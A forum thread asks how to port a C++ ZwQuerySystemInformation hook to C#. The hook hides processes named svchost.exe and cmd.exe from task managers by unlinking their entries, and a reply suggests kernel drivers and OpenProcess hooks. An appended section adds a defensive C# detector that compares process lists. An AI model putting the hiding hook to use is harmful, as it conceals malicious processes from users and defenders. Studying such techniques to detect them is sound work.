C# EasyHook SYSTEM_INFORMATION_CLASS

05/07/2014 18:26 cablehead#1
I have a hook of ZwQuerySystemInformation trying to hide a process. All is fine...except making sense of the hooked SystemInformation values. How can I loop through the process names? (C#)

C++ looks like this: (I'm lost)
NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass, PVOID Buffer, ULONG Length, PULONG ReturnLength)
{
    PSYSTEM_PROCESS_INFO pCurr, pNext;
    NTSTATUS ret;

    if (InfoClass != 5)
    {
        return fnNtQuerySystemInformation(InfoClass, Buffer, Length, ReturnLength);
    }

    ret = fnNtQuerySystemInformation(InfoClass, Buffer, Length, ReturnLength);

    if (NT_SUCCESS(ret))
    {
        pCurr = NULL;
        pNext = Buffer;

        while (pNext->NextEntryOffset != 0)
        {
            pCurr = pNext;
            pNext = (PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr + pCurr->NextEntryOffset);

            if (!wcscmp(L"svchost.exe", pNext->ImageName.Buffer))
            {
                if (pNext->NextEntryOffset == 0)
                {
                    pCurr->NextEntryOffset = 0;
                }
                else
                {
                    pCurr->NextEntryOffset += pNext->NextEntryOffset;
                }

                pNext = pCurr;
            }

            if (!wcscmp(L"cmd.exe", pNext->ImageName.Buffer))
            {
                if (pNext->NextEntryOffset == 0)
                {
                    pCurr->NextEntryOffset = 0;
                }
                else
                {
                    pCurr->NextEntryOffset += pNext->NextEntryOffset;
                }

                pNext = pCurr;
            }
        }
    }

    return ret;
}

Can anyone convert the above to C#?
My Hook:
static IntPtr NTQuerryInfo_Hooked(SYSTEM_INFORMATION_CLASS SystemInformationClass,
    System.IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength)
{
    Main This = (Main)HookRuntimeInfo.Callback;

    //I need to read the Structure here and remove the process name before returning.....

    return ZwQuerySystemInformation(SystemInformationClass,
        SystemInformation, SystemInformationLength, ref ReturnLength);
}
05/11/2014 02:14 cookie69#2
Quote:
Originally Posted by cablehead
I have a hook of ZwQuerySystemInformation trying to hide a process. All is fine...except making sense of the hooked SystemInformation values. How can I loop through the process names? (C#)
If you want to "hide" a process you will need to make a driver in kernel mode to hide it. You should search for "Windows Driver Kit" in Google, but it is not easy programming at all, since you will have to play with undocumented routines (NTxxx and ZWxxx) and it is easy to make a blue screen of death... And I don't think that you can do it in C# (most drivers are written in C). Now, even if you "hide" your process, it is ALWAYS possible to find it => brute force!!

Instead, try to hook the OpenProcess() routine in kernel mode (make a driver) so other processes don't get access to it. Well, it depends on what you are looking for..
05/11/2014 02:48 cablehead#3
The C code posted is working to hide a process...from Task Manager, Process Explorer etc. My C# API hook (EasyHook) to NTQuerry is also working fine...I can actually get a list of processes every time it fires....but...my list is returned as an array of SYSTEM_PROCESS_INFORMATION structures....in an IntPtr..

The posted code modifies one offset/process structure of the array (the exe to be hidden) and returns the modified array.

That's where I'm stuck..
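A defender-side counterpart to the thread, added here as an example (it is not code from the thread, from EasyHook, or from either poster). It walks the SYSTEM_PROCESS_INFORMATION chain that cablehead's hook sees, which is the "loop through the process names" part of the question, and then cross-checks that list against the brute-force PID sweep cookie69 mentions: a PID that OpenProcess can reach but that never appears in the chain is exactly what unlinking an entry leaves behind. The class and method names (HiddenProcessCheck, ListFromNtQuery, ListFromPidSweep, FindHidden), the buffer sizes and the PID bound are assumptions of this example; the struct layout is the Vista/Win7 one (56 bytes of timing fields before ImageName), which is what a 2014-era hook would see.

```csharp
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

// Added example, not code from the thread or from EasyHook. It enumerates
// processes by walking the SYSTEM_PROCESS_INFORMATION chain that
// NtQuerySystemInformation(SystemProcessInformation = 5) fills in, then
// cross-checks that list against a brute-force PID sweep with OpenProcess.
static class HiddenProcessCheck
{
    const int SystemProcessInformation = 5;
    const uint STATUS_INFO_LENGTH_MISMATCH = 0xC0000004;
    const uint PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;
    const int ERROR_INVALID_PARAMETER = 87;

    [StructLayout(LayoutKind.Sequential)]
    struct UNICODE_STRING
    {
        public ushort Length;        // in bytes, not characters
        public ushort MaximumLength;
        public IntPtr Buffer;        // IntPtr.Zero for the System Idle Process entry
    }

    // Leading fields only (Vista/Win7 layout, assumed here). Fields after
    // InheritedFromUniqueProcessId are not needed: the next entry is reached
    // through NextEntryOffset, never through the size of this struct.
    [StructLayout(LayoutKind.Sequential)]
    struct SYSTEM_PROCESS_INFORMATION
    {
        public uint NextEntryOffset;
        public uint NumberOfThreads;
        public long WorkingSetPrivateSize;
        public uint HardFaultCount;
        public uint NumberOfThreadsHighWatermark;
        public ulong CycleTime;
        public long CreateTime;
        public long UserTime;
        public long KernelTime;
        public UNICODE_STRING ImageName;
        public int BasePriority;
        public IntPtr UniqueProcessId;
        public IntPtr InheritedFromUniqueProcessId;
    }

    [DllImport("ntdll.dll")]
    static extern uint NtQuerySystemInformation(int SystemInformationClass,
        IntPtr SystemInformation, uint SystemInformationLength, out uint ReturnLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // View 1: every entry reachable through the NextEntryOffset chain, keyed by PID.
    public static Dictionary<uint, string> ListFromNtQuery()
    {
        uint length = 0x10000;                       // assumed starting size
        IntPtr buffer = Marshal.AllocHGlobal((int)length);
        try
        {
            uint needed, status;
            // The call reports STATUS_INFO_LENGTH_MISMATCH until the buffer is big enough.
            while ((status = NtQuerySystemInformation(SystemProcessInformation, buffer, length, out needed))
                   == STATUS_INFO_LENGTH_MISMATCH)
            {
                Marshal.FreeHGlobal(buffer);
                buffer = IntPtr.Zero;
                length = Math.Max(needed, length) * 2;   // slack: the list can grow between calls
                buffer = Marshal.AllocHGlobal((int)length);
            }
            if (status != 0)
                throw new InvalidOperationException("NtQuerySystemInformation failed: 0x" + status.ToString("X8"));

            var processes = new Dictionary<uint, string>();
            IntPtr entry = buffer;
            while (true)
            {
                var spi = (SYSTEM_PROCESS_INFORMATION)Marshal.PtrToStructure(entry, typeof(SYSTEM_PROCESS_INFORMATION));
                string name = spi.ImageName.Buffer == IntPtr.Zero
                    ? "(System Idle Process)"
                    : Marshal.PtrToStringUni(spi.ImageName.Buffer, spi.ImageName.Length / 2);
                processes[(uint)spi.UniqueProcessId.ToInt64()] = name;
                if (spi.NextEntryOffset == 0) break;             // last entry in the chain
                entry = new IntPtr(entry.ToInt64() + spi.NextEntryOffset);
            }
            return processes;
        }
        finally
        {
            if (buffer != IntPtr.Zero) Marshal.FreeHGlobal(buffer);
        }
    }

    // View 2: brute-force the PID space (PIDs are multiples of 4). A PID that does
    // not exist fails with ERROR_INVALID_PARAMETER; any other failure (usually
    // ERROR_ACCESS_DENIED on a protected process) still proves the PID is in use.
    public static HashSet<uint> ListFromPidSweep(uint maxPid = 0x10000)
    {
        var found = new HashSet<uint>();
        for (uint pid = 4; pid < maxPid; pid += 4)
        {
            IntPtr h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, pid);
            if (h != IntPtr.Zero)
            {
                CloseHandle(h);
                found.Add(pid);
            }
            else if (Marshal.GetLastWin32Error() != ERROR_INVALID_PARAMETER)
            {
                found.Add(pid);
            }
        }
        return found;
    }

    // Cross-view check: PIDs present in the sweep but absent from the chain.
    // Taken twice and intersected so a process that starts or exits between
    // the two views is not reported as hidden.
    public static List<uint> FindHidden()
    {
        var first = Suspects();
        var second = Suspects();
        first.IntersectWith(second);
        return new List<uint>(first);
    }

    static HashSet<uint> Suspects()
    {
        var listed = ListFromNtQuery();
        var swept = ListFromPidSweep();
        swept.RemoveWhere(listed.ContainsKey);
        return swept;
    }

    static void Main()
    {
        foreach (var kv in ListFromNtQuery())
            Console.WriteLine("{0,6}  {1}", kv.Key, kv.Value);
        foreach (uint pid in FindHidden())
            Console.WriteLine("PID {0} is reachable with OpenProcess but missing from SystemProcessInformation", pid);
    }
}
```

Two things to keep in mind when using it. First, the check is only as good as the independence of its two views: a user-mode hook installed in the checking process itself would blind both the NtQuerySystemInformation call and the OpenProcess sweep at once, so run it from a process that has not been hooked, and treat a discrepancy as a reason to compare against a third source (a kernel-mode view or a different machine-level tool) rather than as proof on its own. Second, the sweep bound is an assumption; on a busy system PIDs exceed 0x10000, so raise maxPid (the sweep is cheap) rather than trust a short scan.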